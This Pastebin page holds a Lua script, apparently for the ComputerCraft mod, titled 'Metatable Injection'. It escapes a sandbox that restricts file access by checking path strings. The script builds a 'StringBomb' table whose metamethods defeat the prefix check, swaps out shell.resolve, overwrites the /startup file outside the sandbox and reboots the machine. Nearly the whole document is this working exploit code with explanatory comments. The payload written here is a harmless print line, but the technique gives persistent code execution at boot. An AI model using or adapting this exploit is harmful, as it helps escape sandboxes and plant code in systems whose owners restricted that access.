Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --[[
- Metatable Injection Trystan Cannon
- 12 March 2013
- This script uses metatables and their
- respective metamethods to inject into
- functions that restrict certain actions
- based on string values.
- Using metamethods, we can bypass string
- checks and cause certain flags to pass
- even though we're using a metatable
- rather than an actual string.
- This is the function we'll be bypassing:
- fs.open = function(path, mode)
- path = shell.resolve(path);
- if(mode == 'r')then
- if(path:sub(1,13)=="rom/programs/")then
- return fsOpen(path, mode);
- end
- end
- if(path:sub(1,iVirtualDir)==virtualDir)then
- return fsOpen(path, mode);
- else
- return fsOpen(virtualDirCurrent.."/"..path, mode);
- end
- return nil;
- end
- ]]--
- --======================================================================
- -- Variables:
- local targetPath = "/startup" -- The path of the file we want to get a handle on through the StringBomb.
- local oldShellResolve = shell.resolve -- This is the old shell.resolve function that we need to replace in order to keep the path table given
- -- to 'fs.open' to remain our table.
- local virtualDirectory = "Not the virtual directory." -- This is the area where the program has sandboxed our code to. We want this to fail, by the way.
- local StringBomb = { -- This is the table that the __index metamethod will be referencing for any functions invoked on our 'StringBomb' object.
- -- When substring is called on this method, we want it not to return the virtual directory
- -- the 'fs.open' method is looking for.
- ["sub"] = function (self)
- return virtualDirectory
- end,
- -- When self:len() is called by our replaced shell.resolve function, we want it
- -- to return -1 so that we can identify our table.
- ["len"] = function (self)
- return -1
- end
- }
- StringBomb.metatable = { -- The metatable for the StringBomb. This will allow us to sneak into the 'fsOpen' call when the virtual directory is concatenated with us.
- __index = StringBomb,
- -- When someone tries to concatenate a StringBomb with another string, then return
- -- the target of the file we want to get in to.
- __concat = function (firstOperand, secondOperand)
- return targetPath
- end
- }
- --======================================================================
- --======================================================================
- -- Function replacement:
- -- Replace the 'shell.resolve' function so that our table, when passed to 'fs.open', will remain the same rather
- -- than being a string.
- shell.resolve = function (path)
- if path:len() == -1 then
- return path
- end
- return oldShellResolve (path)
- end
- --======================================================================
- --======================================================================
- -- Main:
- -- Create the StringBomb object we'll use to get into the startup file.
- local startupBomb = {}
- setmetatable (startupBomb, StringBomb.metatable)
- -- Get a file handle using our StringBomb.
- local startupFileHandle = fs.open (startupBomb, 'w')
- startupFileHandle.write ("print ('Startup accessed.')")
- startupFileHandle.close()
- -- Prompt the user that we have succeeded.
- print ("Startup overwritten. Rebooting.")
- sleep (0.5)
- os.reboot()
- --======================================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement